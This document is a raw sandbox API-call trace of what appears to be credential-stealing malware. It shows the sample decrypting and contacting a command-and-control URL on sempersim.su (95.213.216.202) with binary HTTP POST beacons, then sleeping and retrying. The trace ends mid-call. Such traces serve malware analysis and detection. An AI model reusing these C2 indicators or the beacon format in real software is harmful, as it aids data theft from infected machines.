GetProcessHeap () returned 0x620000 [0246.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0246.640] GetProcessHeap () returned 0x620000 [0246.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6460f8 | out: hHeap=0x620000) returned 1 [0246.641] GetProcessHeap () returned 0x620000 [0246.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435f0 | out: hHeap=0x620000) returned 1 [0246.641] GetProcessHeap () returned 0x620000 [0246.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643170 [0246.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.642] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.648] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0246.658] GetProcessHeap () returned 0x620000 [0246.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0246.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.659] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0246.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.660] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.661] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.661] GetProcessHeap () returned 0x620000 [0246.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0246.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.662] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643170, pdwDataLen=0x19fcfc | out: pbData=0x643170, pdwDataLen=0x19fcfc) returned 1 [0246.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.663] CryptDestroyKey (hKey=0x62d710) returned 1 [0246.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0246.664] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0246.664] GetProcessHeap () returned 0x620000 [0246.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645858 [0246.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0246.665] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0246.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0246.666] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0246.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0246.667] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0246.667] GetProcessHeap () returned 0x620000 [0246.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0246.667] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec40*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0246.671] GetProcessHeap () returned 0x620000 [0246.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b570 [0246.671] socket (af=2, type=1, protocol=6) returned 0x3cc [0246.671] connect (s=0x3cc, name=0x63ec40*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0246.720] FreeAddrInfoW (pAddrInfo=0x63c118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec40*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0246.720] GetProcessHeap () returned 0x620000 [0246.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0246.721] GetProcessHeap () returned 0x620000 [0246.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0246.721] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0246.722] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0246.722] GetProcessHeap () returned 0x620000 [0246.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0246.722] GetProcessHeap () returned 0x620000 [0246.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0246.723] GetProcessHeap () returned 0x620000 [0246.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6434d0 [0246.723] GetProcessHeap () returned 0x620000 [0246.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0246.724] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0246.725] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0246.725] GetProcessHeap () returned 0x620000 [0246.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0246.725] GetProcessHeap () returned 0x620000 [0246.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0246.725] send (s=0x3cc, buf=0x63a880*, len=237, flags=0) returned 237 [0246.727] send (s=0x3cc, buf=0x6421e0*, len=159, flags=0) returned 159 [0246.727] GetProcessHeap () returned 0x620000 [0246.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0246.727] recv (in: s=0x3cc, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0248.482] GetProcessHeap () returned 0x620000 [0248.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0248.482] GetProcessHeap () returned 0x620000 [0248.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6434d0 | out: hHeap=0x620000) returned 1 [0248.483] GetProcessHeap () returned 0x620000 [0248.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0248.483] GetProcessHeap () returned 0x620000 [0248.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0248.483] closesocket (s=0x3cc) returned 0 [0248.484] GetProcessHeap () returned 0x620000 [0248.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b570 | out: hHeap=0x620000) returned 1 [0248.484] GetProcessHeap () returned 0x620000 [0248.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645858 | out: hHeap=0x620000) returned 1 [0248.485] GetProcessHeap () returned 0x620000 [0248.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0248.485] GetProcessHeap () returned 0x620000 [0248.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0248.486] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x648) returned 0x3cc [0248.487] Sleep (dwMilliseconds=0xea60) [0248.495] GetProcessHeap () returned 0x620000 [0248.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e10 [0248.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.496] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.504] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0248.513] GetProcessHeap () returned 0x620000 [0248.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0248.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.514] CryptImportKey (in: hProv=0x63ba08, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0248.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.515] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.516] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.516] GetProcessHeap () returned 0x620000 [0248.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0248.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.517] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e10, pdwDataLen=0x19fcfc | out: pbData=0x642e10, pdwDataLen=0x19fcfc) returned 1 [0248.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.518] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0248.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.519] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0248.519] GetProcessHeap () returned 0x620000 [0248.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6451e0 [0248.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0248.520] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0248.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0248.520] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0248.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0248.521] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0248.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0248.522] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0248.522] GetProcessHeap () returned 0x620000 [0248.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0248.522] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0248.522] GetProcessHeap () returned 0x620000 [0248.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0248.523] GetProcessHeap () returned 0x620000 [0248.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6451e0 | out: hHeap=0x620000) returned 1 [0248.523] GetProcessHeap () returned 0x620000 [0248.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e10 | out: hHeap=0x620000) returned 1 [0248.523] GetProcessHeap () returned 0x620000 [0248.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ee8 [0248.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.524] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0248.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.531] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0248.537] GetProcessHeap () returned 0x620000 [0248.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0248.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.538] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0248.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.539] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0248.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.540] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.540] GetProcessHeap () returned 0x620000 [0248.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0248.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.541] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ee8, pdwDataLen=0x19fcfc | out: pbData=0x642ee8, pdwDataLen=0x19fcfc) returned 1 [0248.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.544] CryptDestroyKey (hKey=0x62d710) returned 1 [0248.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0248.545] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0248.545] GetProcessHeap () returned 0x620000 [0248.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ed0 [0248.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0248.546] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0248.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0248.547] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0248.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0248.548] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0248.548] GetProcessHeap () returned 0x620000 [0248.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0248.548] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c438*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0248.549] GetProcessHeap () returned 0x620000 [0248.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b610 [0248.549] socket (af=2, type=1, protocol=6) returned 0x3d0 [0248.550] connect (s=0x3d0, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0248.602] FreeAddrInfoW (pAddrInfo=0x63c438*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0248.603] GetProcessHeap () returned 0x620000 [0248.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0248.603] GetProcessHeap () returned 0x620000 [0248.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0248.605] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0248.606] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0248.606] GetProcessHeap () returned 0x620000 [0248.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0248.606] GetProcessHeap () returned 0x620000 [0248.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0248.606] GetProcessHeap () returned 0x620000 [0248.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6433f8 [0248.607] GetProcessHeap () returned 0x620000 [0248.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0248.608] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0248.609] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0248.609] GetProcessHeap () returned 0x620000 [0248.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0248.609] GetProcessHeap () returned 0x620000 [0248.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0248.609] send (s=0x3d0, buf=0x63a880*, len=237, flags=0) returned 237 [0248.610] send (s=0x3d0, buf=0x6421e0*, len=159, flags=0) returned 159 [0248.610] GetProcessHeap () returned 0x620000 [0248.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0248.610] recv (in: s=0x3d0, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0250.527] GetProcessHeap () returned 0x620000 [0250.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0250.528] GetProcessHeap () returned 0x620000 [0250.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6433f8 | out: hHeap=0x620000) returned 1 [0250.528] GetProcessHeap () returned 0x620000 [0250.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0250.529] GetProcessHeap () returned 0x620000 [0250.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0250.529] closesocket (s=0x3d0) returned 0 [0250.530] GetProcessHeap () returned 0x620000 [0250.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b610 | out: hHeap=0x620000) returned 1 [0250.530] GetProcessHeap () returned 0x620000 [0250.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ed0 | out: hHeap=0x620000) returned 1 [0250.531] GetProcessHeap () returned 0x620000 [0250.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ee8 | out: hHeap=0x620000) returned 1 [0250.533] GetProcessHeap () returned 0x620000 [0250.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0250.552] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xacc) returned 0x3d0 [0250.556] Sleep (dwMilliseconds=0xea60) [0250.580] GetProcessHeap () returned 0x620000 [0250.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0250.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.581] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.605] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0250.613] GetProcessHeap () returned 0x620000 [0250.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0250.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.614] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0250.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.615] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.617] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.617] GetProcessHeap () returned 0x620000 [0250.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0250.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.618] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0250.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.619] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0250.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.624] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0250.624] GetProcessHeap () returned 0x620000 [0250.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0250.624] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0250.625] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0250.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0250.626] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0250.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0250.627] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0250.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0250.627] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0250.628] GetProcessHeap () returned 0x620000 [0250.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0250.628] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0250.628] GetProcessHeap () returned 0x620000 [0250.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0250.629] GetProcessHeap () returned 0x620000 [0250.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0250.629] GetProcessHeap () returned 0x620000 [0250.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0250.629] GetProcessHeap () returned 0x620000 [0250.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643638 [0250.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.630] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.638] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0250.645] GetProcessHeap () returned 0x620000 [0250.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0250.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.646] CryptImportKey (in: hProv=0x63ba90, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0250.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.647] CryptSetKeyParam (hKey=0x62d710, 